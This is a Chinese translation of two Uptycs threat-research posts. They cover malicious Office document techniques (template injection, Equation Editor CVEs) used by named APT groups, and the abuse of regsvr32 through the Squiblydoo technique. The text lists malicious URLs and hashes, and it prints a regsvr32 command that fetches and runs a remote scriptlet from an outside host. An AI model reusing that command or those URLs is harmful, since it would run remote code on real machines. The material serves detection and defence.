惡意文檔攻擊技術介紹

寫在前面：這是在瀏覽Uptycs網站時看到的文檔，都是關于釣魚攻擊時，使用惡意文檔的手法。

惡意文檔技術、目標和攻擊的最新趨勢

2021年2月11日

    Uptycs威脅研究團隊監控目前很活躍的針對性攻擊和趨勢。我們最近看到威脅攻擊者和APT組織經常使用兩種基于文檔的技術:模板注入（Template injection）和方程式編輯器（Equation Editor ）。在這篇文章中，我們將說明這些常用的技術，并介紹使用它們的APT組織。

模板注入技術（Template injection）

    微軟的Office規范允許在文檔中嵌入外部或遠程資源。該特性允許用戶使用本地或遠程計算機上的模板創建文檔。利用這個特性，攻擊者通過在文檔中注入惡意URL來實現模板注入。在執行時，文檔試圖打開、下載和運行惡意模板。

    與依賴靜態檢測的防惡意軟件解決方案和靜態分析工具相比，這種技術為攻擊者提供了額外的優勢。MITRE ATT&CK ID T1221中描述了這種通過“地內生存”（living off the land）繞過安全控制的技術。使用這種技術，攻擊者可以很容易地啟動下一階段的有效載荷，甚至可以使用Phishery等工具包獲取憑證。

方程式編輯器（Equation Editor）

    方程編輯器(eqnedt32.exe)是一個進程外（out-of-process）的COM服務器微軟模塊，允許在文檔中寫一個數學方程式。由于這是一個進程外的COM服務器，針對任何Microsoft Office應用程序的保護可能無法對2017-2018年期間的常見漏洞提供保護，如CVE-2018-0798、CVE-2017-1182和CVE-2018-0802。威脅攻擊者通常部署一個有漏洞的RTF文檔來執行惡意載荷。該技術屬于MITRE ATT&CK ID T1203中描述的客戶端執行漏洞利用。

    接下來，我們將詳細介紹最近的有針對性攻擊和使用這些技術的威脅組織。

威脅團伙：TinyScouts

    技巧：通過下載DOTM模板的DOCX文件進行模板注入

    我們的威脅情報系統檢測到一份名為“Счет на оплату АКИТ - 53557.docx”的文件。翻譯過來是“付款賬戶AKIT - 53557.docx。”(哈希:36 d335d96db7cccf84a732afa8b264fa72443aa8ba31445d20879882b783513b。)這份文件與TinyScouts團伙有關，該組織使用勒索軟件和密碼竊取，以俄羅斯工業家和企業家聯盟的成員為目標。

    同一份文件通過三個不同Bit.ly鏈接，重定向到Cloudflare worker URL (workers.dev)托管文檔:

https://bit.ly/36dtpcl→https://shiny-meadowce6e.xena.workers.dev/6754345654

https://bit.ly/3oi5nmy→https://restless-shadow-3c21 .xena.workers.dev / 543

https://bit.ly/2o2g1n7→https://curly-wind-45ba.xena.workers.dev / 345678765

    該文檔是Microsoft Office Open XML (OOXML)格式。它包含惡意的DOTM模板URL，見于word\_rels\settings.xml.rels(參見下圖)。

    執行后，該文檔打開從konturskb.com下載的惡意DOTM文件，如下圖所示。

    Uptycs’ EDR 功能檢測到這個攻擊，威脅評分 10/10。

威脅組織: Gamaredon

     技巧:通過DOC文件下載DOT模板進行模板注入。

 另一個模板注入文檔標題是“ПланслужбипоРзГТОТнар2021?к(звнес.правками Т.Р.).doc”，翻譯過來是“RzGTOT 2021年服務計劃(經TR修訂）.doc”。(哈希:156 d440b1b6c8ea39d961b4ad6c942d0b4d33dacbd2702c3711d5f1ca0831833。)這份文件與Gamaredon團伙有關，該組織也被稱為原始熊或世界末日行動，他們使用多種入侵手段來監視烏克蘭政府的人。

    與前面的示例不同，Gamaredon文檔包含惡意DOT模板URL，顯示在1Table 內容中，如下圖所示。

    該文件也有四頁。這將繞過靜態啟發式引擎的檢測，因為這些引擎通常根據頁面數掃描可疑文件(惡意文檔通常是第一頁)。

    該文件執行后，打開從asiliidae.online下載的惡意DOT文件。(參見下圖)

在分析的時候，惡意的DOT模板已經關閉，并且沒有提供任何內容。

威脅簡介:GuLoader

    技術:通過DOCX文件進行模板注入，使用短鏈接下載帶有DOC擴展名的RTF文件。

    該注入文件的模板標題為“SPPG-contract PO12403_PF01-0560-21_Korea Marine Service Power_Contract No 0560-19-01-2021.docx”。(哈希:8465 a0869d5b2998b2099ce04c72ccb2126aac34b4ed192b47caf36c55cdbda5。)該文檔是微軟的Office Open XML (OOXML)格式。它包含一個turl.no短鏈接，顯示在word/_rels/webSettings.xml.rels中。(參見下圖)。

    這個URL下載一個名為“document.doc”的RTF文件，該文件下載一個名為GuLoader的基于Visual Basic的有效載荷。

威脅團伙: Confucius

    技巧:方程式編輯器漏洞。

    正如我們在之前的文章中提到的，Confucius(也被稱為Mo Luoxiu)是一個主要針對南亞政府部門的威脅攻擊團伙，它使用Warzone RAT作為階段載荷。該威脅團伙使用了多個模板注入誘餌和一個基于RTF的方程式編輯器漏洞。 

    我們最近發現了這個小組使用一個基于RTF的方程式編輯器（Equation Editor）漏洞。

其他攻擊

    除此之外，我們還觀察到Lazarus威脅攻擊團伙和一些工具包，如Formbook、LokiBot、Agent Tesla、NanoCore RAT、Warzone RAT和Remcos RAT，經常在惡意文檔中使用這些技術。

    我們持續看到威脅攻擊者使用帶有模板注入攻擊的惡意文檔和方程式攻擊（Equation Editor）來下載下一階段的有效載荷。我們預計這些攻擊會繼續下去，因為它們成功地繞過了安全控制和靜態掃描器。

    企業用戶從未知或不可信的來源打開文檔時必須謹慎。企業管理員和事件響應團隊必須定期監視執行這些文檔后產生的可疑進程、事件和網絡流量。為此，Uptycs的EDR功能中的高級分析、威脅情報和細粒度可視化可以幫助組織識別目標攻擊中的工件、事件和工具包。

摘自：

https://www.uptycs.com/blog/recent-trends-in-malicious-document-techniques-targets-and-attacks

（完）

越來越多的攻擊者通過辦公文檔使用Regsvr32工具

2022年2月9日 

    Uptycs威脅研究團隊發現，通過各種類型的Microsoft Office文檔，regsvr32.exe的使用率大幅增加。在我們對這些惡意軟件樣本的分析中，我們發現一些惡意軟件樣本試圖執行.ocx文件，屬于Qbot和Lokibot。

    本博客詳細介紹了regsvr32.exe和Squiblydoo技術的使用，以及來自我們威脅情報系統和Uptycs EDR檢測的分析。

Regsvr32工具和Squiblydoo 技術

    Regsvr32是一個微軟簽名的命令行工具，它允許用戶注冊和注銷DLL(動態鏈接庫)。通過注冊DLL文件，信息被添加到中心目錄(注冊表)，以便Windows可以使用它。這使得其他程序可以更容易地利用DLL的功能。

    威脅攻擊者可以使用regsvr32來加載COM scriptlets來執行DLL。此方法不會對注冊表進行更改，因為COM對象并未實際注冊，但是卻執行了。這種技術通常被稱為Squiblydoo技術，它允許威脅攻擊者在攻擊執行階段繞過應用程序白名單。

示例：regsvr32.exe" /s /n /u /i:http://lyncdiscover.2bunny.com/Autodiscover scrobj.dll

    下面顯示了通過Uptycs EDR提供的檢測和檢測圖。

我們威脅情報系統的分析

    使用來自客戶遙測和威脅情報系統的數據，Uptycs威脅研究團隊已經觀察到超過500個樣本使用regsvr32.exe注冊.ocx文件。

示例：regsvr32 -e -n -i:&Tiposa!G22& C:\ \ ProgramData \ \ Dotr4.ocx

    這些樣本中97%屬于惡意的Microsoft Office文檔，比如帶有.xlsb或.xlsm擴展名的Excel電子表格文件

    Microsoft Excel - xlsm/xlsb文檔中嵌入宏和阻礙分析的技術，這些技術通常使用宏中的公式從URL下載或執行惡意載荷。

    Microsoft Word/富文本格式數據/復合文檔—嵌入惡意宏的.doc、.docx或.doc文件，這些文件使用文檔中的公式從URL下載惡意載荷。

    Uptycs EDR檢測regsvr32的可疑執行，在MITRE ATT&CK框架的各種戰術和技術(分別是防御規避和簽名二進制代理執行)中得到使用，并為遙測提供父/子進程關系、關聯和威脅情報。

    通過Uptycs EDR提供的檢測和檢測圖如下所示(參見圖4和圖5)。

識別可疑的regsvr32執行

    由于regsvr32經常用于合法的日常操作，這對傳統的安全解決方案和監控此進程的安全團隊提出了挑戰。

    安全團隊可以對以下幾個方面進行監控：

• regsvr32與Microsoft Word或Microsoft Excel的父進程之間的父/子進程關系
• 它可以通過查找是否regsvr32.exe加載了運行COM scriptlet的scrobj.dll

    Uptycs EDR使用多層檢測方法，只使用Squiblydoo技術檢測攻擊，但也根據自定義復合評分和嚴重性對事件進行優先級排序。這減少了警報疲勞，并允許分析人員首先關注關鍵事件。除了通過行為規則進行檢測，Upytcs的高級關聯引擎還提供了與警報相對應的更多洞察。

摘自：

https://www.uptycs.com/blog/attackers-increasingly-adopting-regsvr32-utility-execution-via-office-documents

（完）